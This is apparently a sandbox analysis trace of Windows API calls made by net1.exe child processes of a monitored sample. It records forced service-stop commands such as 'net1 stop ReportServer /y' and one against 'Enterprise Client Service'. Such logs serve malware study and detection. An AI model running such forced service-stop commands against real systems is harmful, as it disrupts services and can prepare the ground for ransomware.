lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x2a [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET STATISTICS\r\n[WOR", _MaxCount=0x14) returned 14 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x15 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET STOP\r\nservice\r\n\r", _MaxCount=0x14) returned 19 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x58 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET TIME\r\n\r\n[\\\\compu", _MaxCount=0x14) returned -1 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x184 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET USE\r\n[devicename", _MaxCount=0x14) returned -2 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0xc7 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET USER\r\n[username ", _MaxCount=0x14) returned -2 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x47 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET VIEW\r\n[\\\\compute", _MaxCount=0x14) returned -3 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0xc2 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET\r\n [ ACCOUNTS ", _MaxCount=0x14) returned 19 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x319 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="SERVICES\r\nNET START ", _MaxCount=0x14) returned -5 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x483 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="SYNTAX\r\nThe followin", _MaxCount=0x14) returned -5 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0xa86 [0120.168] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NAMES\r\nThe following", _MaxCount=0x14) returned 4 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x54 [0120.168] _wcsnicmp (_String1="NET stop “Enterprise", _String2="\r\nFor more informati", _MaxCount=0x14) returned 97 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0xad [0120.168] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x2e [0120.168] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x7d [0120.168] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x26 [0120.168] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x19 [0120.168] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x1b [0120.168] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0xbe [0120.168] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0120.168] LocalFree (hMem=0x4c9510) returned 0x0 [0120.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x33 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x19 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0xc1 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x16 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x33 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x234 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x13 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x14 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x14 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x15 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x15 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.169] LocalFree (hMem=0x4c9510) returned 0x0 [0120.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x16 [0120.169] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4c9510) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="䰘L⡋盺\x18锐L\x18") returned 0x11 [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4c4c18) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="딐L⡋盺\x18䰘L\x18") returned 0x14 [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4cb510) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="딐L⡋盺\x18딐L\x18") returned 0x12 [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4cb510) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="딐L⡋盺\x18딐L\x18") returned 0xf [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4cb510) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="딐L⡋盺\x18딐L\x18") returned 0x17 [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4cb510) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="딐L⡋盺\x18딐L\x18") returned 0x18 [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4cb510) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="딐L⡋盺\x18딐L\x18") returned 0x2a [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0120.170] LocalFree (hMem=0x4cb510) returned 0x0 [0120.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="딐L⡋盺\x18딐L\x18") returned 0x15 [0120.170] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0120.170] GetFileType (hFile=0x0) returned 0x0 [0120.170] GetConsoleOutputCP () returned 0x1b5 [0120.792] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0120.792] malloc (_Size=0x16) returned 0x326d0 [0120.792] GetConsoleOutputCP () returned 0x1b5 [0120.792] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x326d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0120.792] WriteFile (in: hFile=0x0, lpBuffer=0x326d0, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x18f604, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f604, lpOverlapped=0x0) returned 0 [0120.792] free (_Block=0x326d0) [0120.792] LocalFree (hMem=0x4cb510) returned 0x0 [0120.793] NetApiBufferFree (Buffer=0x4c1b10) returned 0x0 [0120.793] NetApiBufferFree (Buffer=0x4c1b28) returned 0x0 [0120.793] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Enterprise Client Service” /y" [0120.793] exit (_Code=1) Process: id = "239" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5ee20000" os_pid = "0x854" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "127" os_parent_pid = "0xe84" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 633 os_tid = 0x5f4 [0119.574] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f82c | out: lpSystemTimeAsFileTime=0x16f82c*(dwLowDateTime=0x1b039110, dwHighDateTime=0x1d6f0d1)) [0119.574] GetCurrentProcessId () returned 0x854 [0119.574] GetCurrentThreadId () returned 0x5f4 [0119.574] GetTickCount () returned 0x11512c6 [0119.574] QueryPerformanceCounter (in: lpPerformanceCount=0x16f824 | out: lpPerformanceCount=0x16f824*=23867470115) returned 1 [0119.574] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.574] __set_app_type (_Type=0x1) [0119.574] __p__fmode () returned 0x770331f4 [0119.574] __p__commode () returned 0x770331fc [0119.574] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.575] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.575] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.575] GetConsoleOutputCP () returned 0x1b5 [0119.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0119.575] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.578] sprintf_s (in: _DstBuf=0x16f7e4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.579] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0119.581] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.581] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer /y" [0119.581] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f5b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0119.581] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x6c) returned 0x223ae0 [0119.581] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.581] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f7b4 | out: Buffer=0x16f7b4*=0x221ae8) returned 0x0 [0119.581] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f7b4 | out: Buffer=0x16f7b4*=0x221b00) returned 0x0 [0119.581] _fileno (_File=0x77032900) returned -2 [0119.581] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0119.581] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.581] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.581] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.581] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.581] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.581] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.581] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.581] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.581] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.582] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.582] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.582] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.582] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.582] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.582] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.582] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.582] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.582] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.582] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.582] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.582] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.582] _wcsicmp (_String1="accounts", _String2="ReportServer") returned -17 [0119.582] _wcsicmp (_String1="computer", _String2="ReportServer") returned -15 [0119.582] _wcsicmp (_String1="config", _String2="ReportServer") returned -15 [0119.582] _wcsicmp (_String1="continue", _String2="ReportServer") returned -15 [0119.582] _wcsicmp (_String1="cont", _String2="ReportServer") returned -15 [0119.582] _wcsicmp (_String1="file", _String2="ReportServer") returned -12 [0119.582] _wcsicmp (_String1="files", _String2="ReportServer") returned -12 [0119.582] _wcsicmp (_String1="group", _String2="ReportServer") returned -11 [0119.582] _wcsicmp (_String1="groups", _String2="ReportServer") returned -11 [0119.582] _wcsicmp (_String1="help", _String2="ReportServer") returned -10 [0119.582] _wcsicmp (_String1="helpmsg", _String2="ReportServer") returned -10 [0119.582] _wcsicmp (_String1="localgroup", _String2="ReportServer") returned -6 [0119.582] _wcsicmp (_String1="pause", _String2="ReportServer") returned -2 [0119.582] _wcsicmp (_String1="session", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="sessions", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="sess", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="share", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="start", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="stats", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="statistics", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="stop", _String2="ReportServer") returned 1 [0119.582] _wcsicmp (_String1="time", _String2="ReportServer") returned 2 [0119.582] _wcsicmp (_String1="user", _String2="ReportServer") returned 3 [0119.583] _wcsicmp (_String1="users", _String2="ReportServer") returned 3 [0119.583] _wcsicmp (_String1="msg", _String2="ReportServer") returned -5 [0119.583] _wcsicmp (_String1="messenger", _String2="ReportServer") returned -5 [0119.583] _wcsicmp (_String1="receiver", _String2="ReportServer") returned -13 [0119.583] _wcsicmp (_String1="rcv", _String2="ReportServer") returned -2 [0119.583] _wcsicmp (_String1="netpopup", _String2="ReportServer") returned -4 [0119.583] _wcsicmp (_String1="redirector", _String2="ReportServer") returned -12 [0119.583] _wcsicmp (_String1="redir", _String2="ReportServer") returned -12 [0119.583] _wcsicmp (_String1="rdr", _String2="ReportServer") returned -1 [0119.583] _wcsicmp (_String1="workstation", _String2="ReportServer") returned 5 [0119.583] _wcsicmp (_String1="work", _String2="ReportServer") returned 5 [0119.583] _wcsicmp (_String1="wksta", _String2="ReportServer") returned 5 [0119.583] _wcsicmp (_String1="prdr", _String2="ReportServer") returned -2 [0119.583] _wcsicmp (_String1="devrdr", _String2="ReportServer") returned -14 [0119.583] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer") returned -6 [0119.583] _wcsicmp (_String1="server", _String2="ReportServer") returned 1 [0119.583] _wcsicmp (_String1="svr", _String2="ReportServer") returned 1 [0119.583] _wcsicmp (_String1="srv", _String2="ReportServer") returned 1 [0119.583] _wcsicmp (_String1="lanmanserver", _String2="ReportServer") returned -6 [0119.583] _wcsicmp (_String1="alerter", _String2="ReportServer") returned -17 [0119.583] _wcsicmp (_String1="netlogon", _String2="ReportServer") returned -4 [0119.583] _wcsupr (in: _String="ReportServer" | out: _String="REPORTSERVER") returned="REPORTSERVER" [0119.583] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2254b0 [0119.881] GetServiceKeyNameW (in: hSCManager=0x2254b0, lpDisplayName="REPORTSERVER", lpServiceName=0x39aaf0, lpcchBuffer=0x16f750 | out: lpServiceName="", lpcchBuffer=0x16f750) returned 0 [0119.881] _wcsicmp (_String1="msg", _String2="REPORTSERVER") returned -5 [0119.881] _wcsicmp (_String1="messenger", _String2="REPORTSERVER") returned -5 [0119.882] _wcsicmp (_String1="receiver", _String2="REPORTSERVER") returned -13 [0119.882] _wcsicmp (_String1="rcv", _String2="REPORTSERVER") returned -2 [0119.882] _wcsicmp (_String1="redirector", _String2="REPORTSERVER") returned -12 [0119.882] _wcsicmp (_String1="redir", _String2="REPORTSERVER") returned -12 [0119.882] _wcsicmp (_String1="rdr", _String2="REPORTSERVER") returned -1 [0119.882] _wcsicmp (_String1="workstation", _String2="REPORTSERVER") returned 5 [0119.882] _wcsicmp (_String1="work", _String2="REPORTSERVER") returned 5 [0119.882] _wcsicmp (_String1="wksta", _String2="REPORTSERVER") returned 5 [0119.882] _wcsicmp (_String1="prdr", _String2="REPORTSERVER") returned -2 [0119.882] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER") returned -14 [0119.882] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER") returned -6 [0119.882] _wcsicmp (_String1="server", _String2="REPORTSERVER") returned 1 [0119.882] _wcsicmp (_String1="svr", _String2="REPORTSERVER") returned 1 [0119.882] _wcsicmp (_String1="srv", _String2="REPORTSERVER") returned 1 [0119.882] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER") returned -6 [0119.882] _wcsicmp (_String1="alerter", _String2="REPORTSERVER") returned -17 [0119.882] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER") returned -4 [0119.882] NetServiceControl (in: servername=0x0, service="REPORTSERVER", opcode=0x0, arg=0x0, bufptr=0x16f74c | out: bufptr=0x16f74c) returned 0x889 [0119.884] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.884] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0119.884] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.886] GetFileType (hFile=0x0) returned 0x0 [0119.886] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x223ed0 [0119.886] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x223ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0119.886] WriteFile (in: hFile=0x0, lpBuffer=0x223ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f68c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f68c, lpOverlapped=0x0) returned 0 [0119.886] LocalFree (hMem=0x223ed0) returned 0x0 [0119.886] GetFileType (hFile=0x0) returned 0x0 [0119.886] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226178 [0119.886] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 